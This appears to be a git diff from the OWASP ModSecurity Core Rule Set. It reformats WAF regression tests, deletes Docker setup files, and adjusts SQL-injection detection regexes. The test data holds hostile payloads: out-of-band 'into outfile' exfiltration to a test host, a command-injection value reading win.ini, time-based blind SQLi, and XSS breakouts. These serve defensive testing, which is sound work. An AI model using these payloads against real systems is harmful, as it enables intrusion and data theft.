HTTP/1.0 output: log_contains: id "942260" @@ -256,7 +256,7 @@ method: POST port: 80 uri: "/" - data : "var=/config.ini' into outfile '\x5c\x5c\x5c\x5cil7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\x5c\x5cyxq'; --" + data: "var=/config.ini' into outfile '\x5c\x5c\x5c\x5cil7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\x5c\x5cyxq'; --" version: HTTP/1.0 output: log_contains: id "942260" @@ -273,7 +273,7 @@ method: POST port: 80 uri: "/" - data : "var=EmptyValue into outfile '\x5c\x5c\x5c\x5cjviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\x5c\x5cxct'; --" + data: "var=EmptyValue into outfile '\x5c\x5c\x5c\x5cjviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\x5c\x5cxct'; --" version: HTTP/1.0 output: log_contains: id "942260" @@ -290,7 +290,7 @@ method: POST port: 80 uri: "/" - data : "var=test@coreruleset.org\x22|type %SYSTEMROOT%\x5cwin.ini" + data: "var=test@coreruleset.org\x22|type %SYSTEMROOT%\x5cwin.ini" version: HTTP/1.0 output: log_contains: id "942260" @@ -307,7 +307,7 @@ method: POST port: 80 uri: "/" - data : "var=mytest>'>\x22>" + data: "var=mytest>'>\x22>" version: HTTP/1.0 output: log_contains: id "942260" @@ -324,7 +324,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22123-456-123@coreruleset.org\x22' and (select*from(select(sleep(10)))a)--" + data: "var=\x22123-456-123@coreruleset.org\x22' and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: log_contains: id "942260" @@ -341,7 +341,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22tester@coreruleset.org\x22' waitfor delay'0:0:20'--" + data: "var=\x22tester@coreruleset.org\x22' waitfor delay'0:0:20'--" version: HTTP/1.0 output: log_contains: id "942260" @@ -358,7 +358,7 @@ method: POST port: 80 uri: "/" - data : "var=\x22-->'-->`-->" + data: "var=\x22-->'-->`-->" version: HTTP/1.0 output: log_contains: id "942260" @@ -375,7 +375,7 @@ method: POST port: 80 uri: "/" - data : "var='\x22>" + data: "var='\x22>" version: HTTP/1.0 output: log_contains: id "942260" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index ba1f5224d..90c6e0dd6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -562,7 +562,7 @@ method: POST port: 80 uri: "/" - data: "execute syste" + data: "execute system" version: HTTP/1.0 output: log_contains: id "942380" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index 17e5dd478..dc6f8b956 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -175,4 +175,3 @@ version: HTTP/1.0 output: log_contains: id "942470" - diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index cdcf3de4e..28f5baca0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -41,4 +41,3 @@ version: HTTP/1.0 output: log_contains: "id \"942480" - diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index f3869a577..bd74d0a22 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -32,4 +32,3 @@ encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE1vZFNlY3VyaXR5IENSUyAzIFRlc3RzDQpBY2NlcHQ6IHRleHQveG1sLGFwcGxpY2F0aW9uL3htbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsdGV4dC9odG1sO3E9MC45LHRleHQvcGxhaW47cT0wLjgsaW1hZ2UvcG5nLCovKjtxPTAuNQ0KQWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tdXMsZW47cT0wLjUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogOQ0KDQp0ZXN0PaztAAUNCg0K" output: log_contains: "id \"944200\"" - diff --git a/tests/regression/tests/base_positive_rules.py b/tests/regression/tests/base_positive_rules.py index 08b9b5dcc..b0dc08db3 100755 --- a/tests/regression/tests/base_positive_rules.py +++ b/tests/regression/tests/base_positive_rules.py @@ -101,4 +101,4 @@ print ('Generated %s rules to file %s' % (str(skeletontest), start_options.output)) o.close() -#print('\nGenerated %s tests' % (str(skeletontest))) \ No newline at end of file +#print('\nGenerated %s tests' % (str(skeletontest))) diff --git a/tests/regression/utils/testSampling.py b/tests/regression/utils/testSampling.py index 58ac53f4c..e7e1223a4 100644 --- a/tests/regression/utils/testSampling.py +++ b/tests/regression/utils/testSampling.py @@ -43,4 +43,4 @@ def run_requests(iterations): def test_sampling(): print "running" block,passed = run_requests(100) - assert block < 55 and block > 45 \ No newline at end of file + assert block < 55 and block > 45 diff --git a/util/av-scanning/runAV/common.c b/util/av-scanning/runAV/common.c index 763c58ad0..e7ba76069 100755 --- a/util/av-scanning/runAV/common.c +++ b/util/av-scanning/runAV/common.c @@ -650,4 +650,3 @@ int init_cgi() return 0; } - diff --git a/util/browser-tools/js-overrides.js b/util/browser-tools/js-overrides.js index 66d7b464f..34d501779 100644 --- a/util/browser-tools/js-overrides.js +++ b/util/browser-tools/js-overrides.js @@ -75,4 +75,4 @@ XSSTripwire.proxy(document, 'write', 'document.write', true); XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true); -})(); \ No newline at end of file +})(); diff --git a/util/docker/Dockerfile b/util/docker/Dockerfile deleted file mode 100644 index ab713700e..000000000 --- a/util/docker/Dockerfile +++ /dev/null @@ -1,32 +0,0 @@ -FROM owasp/modsecurity:2.9-apache-ubuntu -MAINTAINER Chaim Sanders chaim.sanders@gmail.com - -ARG COMMIT=v3.3/dev -ARG REPO=SpiderLabs/owasp-modsecurity-crs -ENV PARANOIA=1 -ENV ANOMALYIN=5 -ENV ANOMALYOUT=4 - -RUN apt-get update && \ - apt-get -y install python git ca-certificates iproute2 - -RUN cd /opt && \ - git clone https://github.com/${REPO}.git owasp-modsecurity-crs-3.2 && \ - cd owasp-modsecurity-crs-3.2 && \ - git checkout -qf ${COMMIT} - -RUN cd /opt && \ - cp -R /opt/owasp-modsecurity-crs-3.2/ /etc/apache2/modsecurity.d/owasp-crs/ && \ - mv /etc/apache2/modsecurity.d/owasp-crs/crs-setup.conf.example /etc/apache2/modsecurity.d/owasp-crs/crs-setup.conf && \ - cd /etc/apache2/modsecurity.d && \ - printf "include modsecurity.d/owasp-crs/crs-setup.conf\ninclude modsecurity.d/owasp-crs/rules/*.conf" > include.conf && \ - sed -i -e 's/SecRuleEngine DetectionOnly/SecRuleEngine On/g' /etc/apache2/modsecurity.d/modsecurity.conf && \ - a2enmod proxy proxy_http - -COPY proxy.conf /etc/apache2/modsecurity.d/proxy.conf -COPY docker-entrypoint.sh / - -EXPOSE 80 - -ENTRYPOINT ["/docker-entrypoint.sh"] -CMD ["apachectl", "-D", "FOREGROUND"] diff --git a/util/docker/Dockerfile-2.9-apache b/util/docker/Dockerfile-2.9-apache deleted file mode 100644 index 7230da894..000000000 --- a/util/docker/Dockerfile-2.9-apache +++ /dev/null @@ -1,33 +0,0 @@ -FROM owasp/modsecurity:2.9-apache -LABEL maintainer="Chaim Sanders " - -ARG COMMIT=v3.3/dev -ARG BRANCH=v3.3/dev -ARG REPO=SpiderLabs/owasp-modsecurity-crs -ENV WEBSERVER=Apache -ENV PARANOIA=1 -ENV ANOMALYIN=5 -ENV ANOMALYOUT=4 - -RUN apt-get update && \ - apt-get -y install python git ca-certificates iproute2 && \ - mkdir /opt/owasp-modsecurity-crs-3.2 && \ - cd /opt/owasp-modsecurity-crs-3.2 && \ - git init && \ - git remote add origin https://github.com/${REPO} && \ - git fetch --depth 1 origin ${BRANCH} && \ - git checkout ${COMMIT} && \ - mv crs-setup.conf.example crs-setup.conf && \ - ln -sv /opt/owasp-modsecurity-crs-3.2 /etc/modsecurity.d/owasp-crs && \ - printf "include /etc/modsecurity.d/owasp-crs/crs-setup.conf\ninclude /etc/modsecurity.d/owasp-crs/rules/*.conf" >> /etc/modsecurity.d/include.conf && \ - sed -i -e 's/SecRuleEngine DetectionOnly/SecRuleEngine On/g' /etc/modsecurity.d/modsecurity.conf - -COPY httpd-logging-before-modsec.conf /usr/local/apache2/conf/extra/httpd-logging-before-modsec.conf -COPY httpd-logging-after-modsec.conf /usr/local/apache2/conf/extra/httpd-logging-after-modsec.conf -COPY docker-entrypoint.sh / - -EXPOSE 80 -EXPOSE 443 - -ENTRYPOINT ["/docker-entrypoint.sh"] -CMD ["apachectl", "-D", "FOREGROUND"] diff --git a/util/docker/Dockerfile-3.0-apache b/util/docker/Dockerfile-3.0-apache deleted file mode 100644 index 883f4a11f..000000000 --- a/util/docker/Dockerfile-3.0-apache +++ /dev/null @@ -1,33 +0,0 @@ -FROM owasp/modsecurity:3.0-apache -LABEL maintainer="Chaim Sanders " - -ARG COMMIT=v3.3/dev -ARG BRANCH=v3.3/dev -ARG REPO=SpiderLabs/owasp-modsecurity-crs -ENV WEBSERVER=Apache -ENV PARANOIA=1 -ENV ANOMALYIN=5 -ENV ANOMALYOUT=4 - -RUN apt-get update && \ - apt-get -y install python git ca-certificates iproute2 && \ - mkdir /opt/owasp-modsecurity-crs-3.2 && \ - cd /opt/owasp-modsecurity-crs-3.2 && \ - git init && \ - git remote add origin https://github.com/${REPO} && \ - git fetch --depth 1 origin ${BRANCH} && \ - git checkout ${COMMIT} && \ - mv crs-setup.conf.example crs-setup.conf && \ - ln -sv /opt/owasp-modsecurity-crs-3.2 /etc/modsecurity.d/owasp-crs && \ - printf "include /etc/modsecurity.d/owasp-crs/crs-setup.conf\ninclude /etc/modsecurity.d/owasp-crs/rules/*.conf" >> /etc/modsecurity.d/include.conf && \ - sed -i -e 's/SecRuleEngine DetectionOnly/SecRuleEngine On/g' /etc/modsecurity.d/modsecurity.conf && \ - mkdir /var/log/apache2/ && \ - sed -i 's|ErrorLog\s.*$|ErrorLog /var/log/apache2/error.log|g' /usr/local/apache2/conf/httpd.conf - -COPY proxy.conf /etc/modsecurity.d/proxy.conf -COPY docker-entrypoint.sh / - -EXPOSE 80 - -ENTRYPOINT ["/docker-entrypoint.sh"] -CMD ["apachectl", "-D", "FOREGROUND"] diff --git a/util/docker/Dockerfile-3.0-nginx b/util/docker/Dockerfile-3.0-nginx deleted file mode 100644 index 5d2a15851..000000000 --- a/util/docker/Dockerfile-3.0-nginx +++ /dev/null @@ -1,30 +0,0 @@ -FROM owasp/modsecurity:3.0-nginx -LABEL maintainer="Chaim Sanders " - -ARG COMMIT=v3.3/dev -ARG BRANCH=v3.3/dev -ARG REPO=SpiderLabs/owasp-modsecurity-crs -ENV WEBSERVER=Nginx -ENV PARANOIA=1 -ENV ANOMALYIN=5 -ENV ANOMALYOUT=4 - -RUN apt-get update && \ - apt-get -y install python git ca-certificates iproute2 && \ - mkdir /opt/owasp-modsecurity-crs-3.2 && \ - cd /opt/owasp-modsecurity-crs-3.2 && \ - git init && \ - git remote add origin https://github.com/${REPO} && \ - git fetch --depth 1 origin ${BRANCH} && \ - git checkout ${COMMIT} && \ - mv crs-setup.conf.example crs-setup.conf && \ - ln -sv /opt/owasp-modsecurity-crs-3.2 /etc/modsecurity.d/owasp-crs && \ - printf "include /etc/modsecurity.d/owasp-crs/crs-setup.conf\ninclude /etc/modsecurity.d/owasp-crs/rules/*.conf" >> /etc/modsecurity.d/include.conf && \ - sed -i -e 's/SecRuleEngine DetectionOnly/SecRuleEngine On/g' /etc/modsecurity.d/modsecurity.conf - -COPY docker-entrypoint.sh / - -EXPOSE 80 - -ENTRYPOINT ["/docker-entrypoint.sh"] -CMD ["nginx", "-g", "daemon off;"] diff --git a/util/docker/README.md b/util/docker/README.md deleted file mode 100644 index 00dfc6414..000000000 --- a/util/docker/README.md +++ /dev/null @@ -1,107 +0,0 @@ -# Example -``` -docker build -t owasp/modsecurity-crs . -docker run -p 80:80 -ti -e PARANOIA=4 --rm owasp/modsecurity-crs -``` - -or - -``` -docker build -t owasp/modsecurity-crs . -docker run -p 80:80 -ti -e PARANOIA=4 -e PROXY=1 --rm owasp/modsecurity-crs -``` -# Environment Variables - -The following environment variables are available to configure the CRS container: - -| Name | Description| -| -------- | ------------------------------------------------------------------- | -| PARANOIA | An integer indicating the paranoia level (Default: 1) | -| PROXY | An integer indicating if reverse proxy mode is enabled (Default: 0) | -| UPSTREAM | The IP Address (and optional port) of the upstream server when proxy mode is enabled. (Default: the container's default router, port 81) (Examples: 192.0.2.2 or 192.0.2.2:80) | -| EXECUTING_PARANOIA | An integer indicating the executing_paranoia_level (Default: paranoia level) | -| ENFORCE_BODYPROC_URLENCODED | A boolean indicating the enforce_bodyproc_urlencoded (Default: 0) | -| ANOMALYIN | An integer indicating the inbound_anomaly_score_threshold (Default: 5) | -| ANOMALYOUT | An integer indicating the outbound_anomaly_score_threshold (Default: 4) | -| ALLOWED_METHODS | A string indicating the allowed_methods (Default: GET HEAD POST OPTIONS) | -| ALLOWED_REQUEST_CONTENT_TYPE | A string indicating the allowed_request_content_type (Default: application/x-www-form-urlencoded\|multipart/form-data\|text/xml\|application/xml\|application/soap+xml\|application/x-amf\|application/json\|application/octet-stream\|application/csp-report\|application/xss-auditor-report\|text/plain) | -| ALLOWED_REQUEST_CONTENT_TYPE_CHARSET | A string indicating the allowed_request_content_type_charset (Default: utf-8\|iso-8859-1\|iso-8859-15\|windows-1252) | -| ALLOWED_HTTP_VERSIONS | A string indicating the allowed_http_versions (Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0) | -| RESTRICTED_EXTENSIONS | A string indicating the restricted_extensions (Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/) | -| RESTRICTED_HEADERS | A string indicating the restricted_headers (Default: /proxy/ /lock-token/ /content-range/ /if/) | -| STATIC_EXTENSIONS | A string indicating the static_extensions (Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/) | -| MAX_NUM_ARGS | An integer indicating the max_num_args (Default: unlimited) | -| ARG_NAME_LENGTH | An integer indicating the arg_name_length (Default: unlimited) | -| ARG_LENGTH | An integer indicating the arg_length (Default: unlimited) | -| TOTAL_ARG_LENGTH | An integer indicating the total_arg_length (Default: unlimited) | -| MAX_FILE_SIZE | An integer indicating the max_file_size (Default: unlimited) | -| COMBINED_FILE_SIZES | An integer indicating the combined_file_sizes (Default: unlimited) | - -# Notes regarding reverse proxy - -In order to more easily test drive the CRS ruleset, we include support for an technique called [Reverse Proxy](https://en.wikipedia.org/wiki/Reverse_proxy). Using this technique, you keep your pre-existing web server online at a non-standard host and port, and then configure the CRS container to accept public traffic. The CRS container then proxies the traffic to your pre-existing webserver. This way, you can test out CRS with any web server. Some notes: - -* Proxy is not enabled by default. You'll need to pass the `-e PROXY=1` environment variable to enable it. -* You'll want to configure your typical webserver to listen on your docker interface only (i.e. 172.17.0.1:81) so that public traffic doesn't reach it. -* Do not use 127.0.0.1 as an UPSTREAM address. The loopback interface inside the docker container is not the same interface as the one on docker host. -* Note that traffic coming through this proxy will look like it's coming from the wrong address. You may want to configure your pre-existing webserver to use the `X-Forwarded-For` HTTP header to populate the remote address field for traffic from the proxy. - -# ModSecurity CRS Tuning - -There are two possible ways to pass ModSecurity CRS tuning rules to the container: - -* To map the ModSecurity tuning file(s) via volumes into the container during the run command -* To copy the ModSecurity tuning file(s) into the created container and then start the container - - -## Map ModSecurity tuning file via volume - -``` -docker run -dti --rm \ - -p 80:80 \ - -v /path/to/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf:/etc/modsecurity.d/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf \ - -v /path/to/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf:/etc/modsecurity.d/owasp-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf \ - owasp/modsecurity-crs -``` - -## Copy ModSecurity tuning file into created container - -This example can be helpful when no volume mounts are possible (some CI pipelines). - -``` -docker create -ti --name modseccrs \ - -p 80:80 \ - owasp/modsecurity-crs - -docker cp /path/to/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf \ - modseccrs:/etc/modsecurity.d/owasp-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf - -docker start modseccrs -``` - -# Full docker run example with all possible environment variables - -``` -docker run -dti 80:80 --rm \ - -e PARANOIA=1 \ - -e EXECUTING_PARANOIA=2 \ - -e ENFORCE_BODYPROC_URLENCODED=1 \ - -e ANOMALYIN=10 \ - -e ANOMALYOUT=5 \ - -e ALLOWED_METHODS="GET POST PUT" \ - -e ALLOWED_REQUEST_CONTENT_TYPE="text/xml|application/xml|text/plain" \ - -e ALLOWED_REQUEST_CONTENT_TYPE_CHARSET="utf-8|iso-8859-1" \ - -e ALLOWED_HTTP_VERSIONS="HTTP/1.1 HTTP/2 HTTP/2.0" \ - -e RESTRICTED_EXTENSIONS=".cmd/ .com/ .config/ .dll/" \ - -e RESTRICTED_HEADERS="/proxy/ /if/" \ - -e STATIC_EXTENSIONS="/.jpg/ /.jpeg/ /.png/ /.gif/" \ - -e MAX_NUM_ARGS=128 \ - -e ARG_NAME_LENGTH=50 \ - -e ARG_LENGTH=200 \ - -e TOTAL_ARG_LENGTH=6400 \ - -e MAX_FILE_SIZE=100000 \ - -e COMBINED_FILE_SIZES=1000000 \ - -e PROXY=1 \ - -e 192.0.2.2:80 \ - owasp/modsecurity-crs -``` diff --git a/util/docker/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf b/util/docker/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf deleted file mode 100644 index cfa1ba4c4..000000000 --- a/util/docker/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf +++ /dev/null @@ -1,7 +0,0 @@ -# https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/v3.2/dev/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example -# -# "...,ctl:ruleRemoveById=942100" -# "...,ctl:ruleRemoveByTag=attack-sqli" -# "...,ctl:ruleRemoveTargetById=942100;ARGS:password" -# "...,ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:password" - diff --git a/util/docker/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf b/util/docker/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf deleted file mode 100644 index 3fdbb9711..000000000 --- a/util/docker/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf +++ /dev/null @@ -1,7 +0,0 @@ -# https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/v3.2/dev/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example -# -# Examples: -# SecRuleRemoveById 942100 -# SecRuleRemoveByTag "attack-sqli" -# SecRuleUpdateTargetById 942100 "!ARGS:password" -# SecRuleUpdateTargetByTag "attack-sqli" "!ARGS:password" diff --git a/util/docker/docker-compose.yaml b/util/docker/docker-compose.yaml deleted file mode 100644 index bfdade1bc..000000000 --- a/util/docker/docker-compose.yaml +++ /dev/null @@ -1,82 +0,0 @@ -# This docker-compose file starts owasp/modsecurity-crs -# -# ATTENTION! -# Some of the environment variables at the bottom of this -# docker-compose.yaml file and TLS are only available -# for self-built images based on Dockerfile-2.9-apache, -# and only if build args SETTLS and SETPROXY were set during -# the build of the parent owasp/modsecurity:2.9-apache image. - -version: "3" - -services: - - crs: - image: owasp/modsecurity-crs - ports: - - "80:80" - # only available if SETTLS was enabled: - - "443:443" - - environment: - - SERVERNAME=localhost - - ############################################# - # CRS Variables - ############################################# - # Paranoia Level - - PARANOIA=1 - # Inbound and Outbound Anomaly Score Threshold - - ANOMALYIN=5 - - ANOMALYOUT=4 - # Executing Paranoia Level - # - EXECUTING_PARANOIA=2 - - ####################################################### - # Reverse Proxy mode - # (only available if SETPROXY was enabled during the - # parent ModSecurity image) - ####################################################### - # PROXYLOCATION: Application Backend of Reverse Proxy - # - PROXYLOCATION=http://app:8000/ - # - # If needed: add own httpd-proxy.conf (only available if SETPROXY - # was enabled during build of parent ModSecurity image) - # - ./httpd-proxy.conf:/usr/local/apache2/conf/extra/httpd-proxy.conf - - ####################################################### - # Various CRS Variables with Default Values - ####################################################### - #- ENFORCE_BODYPROC_URLENCODED=1 - #- ALLOWED_METHODS=GET HEAD POST OPTIONS - #- ALLOWED_REQUEST_CONTENT_TYPE=application/x-www-form-urlencoded|multipart/form-data|text/xml|application/xml|application/soap+xml|application/x-amf|application/json|application/octet-stream|text/plain - #- ALLOWED_REQUEST_CONTENT_TYPE_CHARSET=utf-8|iso-8859-1|iso-8859-15|windows-1252 - #- ALLOWED_HTTP_VERSIONS=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 - #- RESTRICTED_EXTENSIONS=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ - #- RESTRICTED_HEADERS=/proxy/ /lock-token/ /content-range/ /if/ - #- STATIC_EXTENSIONS=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ - - ####################################################### - # CRS Variables with Default Value unlimited - ####################################################### - #- MAX_NUM_ARGS=255 - #- ARG_NAME_LENGTH=100 - #- ARG_LENGTH=400 - #- TOTAL_ARG_LENGTH=64000 - #- MAX_FILE_SIZE=1048576 - #- COMBINED_FILE_SIZES=1048576 - - ####################################################### - # Volumes for ModSecurity Tuning - ####################################################### - volumes: - - ./REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf:/etc/modsecurity.d/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf - - ./RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf:/etc/modsecurity.d/owasp-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf - - ####################################################### - # Add TLS server certificate and key - # (only available if SETPROXY was enabled during the - # parent ModSecurity image) - ####################################################### - # - ./server.crt:/usr/local/apache2/conf/server.crt - # - ./server.key:/usr/local/apache2/conf/server.key diff --git a/util/docker/docker-entrypoint.sh b/util/docker/docker-entrypoint.sh deleted file mode 100755 index 90db2a8f0..000000000 --- a/util/docker/docker-entrypoint.sh +++ /dev/null @@ -1,185 +0,0 @@ -#!/bin/bash - -# Paranoia Level -$(python <s %b \ -\"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \ -%{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \ -%I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \ -%{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \ -%{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended - -CustomLog ${ACCESSLOG} extended - - -# === ModSec timestamps at the start of each phase (ids: 90000 - 90009) - -SecAction "id:90000,phase:1,nolog,pass,setvar:TX.ModSecTimestamp1start=%{DURATION}" -SecAction "id:90001,phase:2,nolog,pass,setvar:TX.ModSecTimestamp2start=%{DURATION}" -SecAction "id:90002,phase:3,nolog,pass,setvar:TX.ModSecTimestamp3start=%{DURATION}" -SecAction "id:90003,phase:4,nolog,pass,setvar:TX.ModSecTimestamp4start=%{DURATION}" -SecAction "id:90004,phase:5,nolog,pass,setvar:TX.ModSecTimestamp5start=%{DURATION}" diff --git a/util/docker/proxy.conf b/util/docker/proxy.conf deleted file mode 100644 index 4dee0c9b4..000000000 --- a/util/docker/proxy.conf +++ /dev/null @@ -1,3 +0,0 @@ - - ProxyPass "/" "http://${UPSTREAM}/" - diff --git a/util/honeypot-sensor/README.md b/util/honeypot-sensor/README.md index b4daf67d7..66fc6af9b 100644 --- a/util/honeypot-sensor/README.md +++ b/util/honeypot-sensor/README.md @@ -1,6 +1,6 @@ The purpose of these files is to turn your current ModSecurity host into a pseudo-honeypot sensor by doing the following: - + 1. Instructs Apache to listen for traffic on multiple unused ports - 8000 - 8080 diff --git a/util/honeypot-sensor/mlogc-honeypot-sensor.conf b/util/honeypot-sensor/mlogc-honeypot-sensor.conf index faab2c18a..b4afad140 100644 --- a/util/honeypot-sensor/mlogc-honeypot-sensor.conf +++ b/util/honeypot-sensor/mlogc-honeypot-sensor.conf @@ -95,4 +95,3 @@ ServerErrorTimeout 60 # reserved for future expansion. # KeepAlive 150 # KeepAliveTimeout 300 - diff --git a/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf b/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf index 5f5344c63..7002bb76e 100644 --- a/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf +++ b/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf @@ -28,4 +28,3 @@ DocumentRoot "/usr/local/apache/honeypot-htdocs" SecAuditEngine On SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf" - diff --git a/util/regexp-assemble/regexp-934100.txt b/util/regexp-assemble/regexp-934100.txt index 0f34b3143..64065bc61 100644 --- a/util/regexp-assemble/regexp-934100.txt +++ b/util/regexp-assemble/regexp-934100.txt @@ -5,4 +5,4 @@ String\s*\.\s*fromCharCode function\s*\(\s*\)\s*{ new\s+Function\s*\( this\.constructor -module\.exports\s*= \ No newline at end of file +module\.exports\s*= diff --git a/util/regexp-assemble/regexp-942210.data b/util/regexp-assemble/regexp-942210.data index 489559033..1dd373cb8 100644 --- a/util/regexp-assemble/regexp-942210.data +++ b/util/regexp-assemble/regexp-942210.data @@ -1,10 +1,10 @@ @.+=\s*?\(\s*?select -\d+\s*?or\s*?\d+\s*?[\-+] -\d+\s*?xor\s*?\d+\s*?[\-+] -\d+\s*?div\s*?\d+\s*?[\-+] -\d+\s*?like\s*?\d+\s*?[\-+] -\d+\s*?between\s*?\d+\s*?[\-+] -\d+\s*?and\s*?\d+\s*?[\-+] +\d\s*?or\s*?\d+\s*?[\-+] +\d\s*?xor\s*?\d+\s*?[\-+] +\d\s*?div\s*?\d+\s*?[\-+] +\d\s*?like\s*?\d+\s*?[\-+] +\d\s*?between\s*?\d+\s*?[\-+] +\d\s*?and\s*?\d+\s*?[\-+] \/\w+;?\s+having\W \/\w+;?\s+and\W \/\w+;?\s+or\W diff --git a/util/regexp-assemble/regexp-942260.data b/util/regexp-assemble/regexp-942260.data index 93b87cdb3..697ac400d 100644 --- a/util/regexp-assemble/regexp-942260.data +++ b/util/regexp-assemble/regexp-942260.data @@ -2,7 +2,7 @@ union\s*?\s*?[([]*?\s*?select\s+ union\s*?all\s*?[([]*?\s*?select\s+ union\s*?distinct\s*?[([]*?\s*?select\s+ union\s*?[(!@]*?\s*?[([]*?\s*?select\s+ -\w+\s+like\s+[\"'`] +\w\s+like\s+[\"'`] like\s*?[\"'`]\% [\"'`]\s*?like\W*?[\"'`\d] [\"'`]\s*?and\s+[\s\w]+=\s*?\w+\s*?having\s+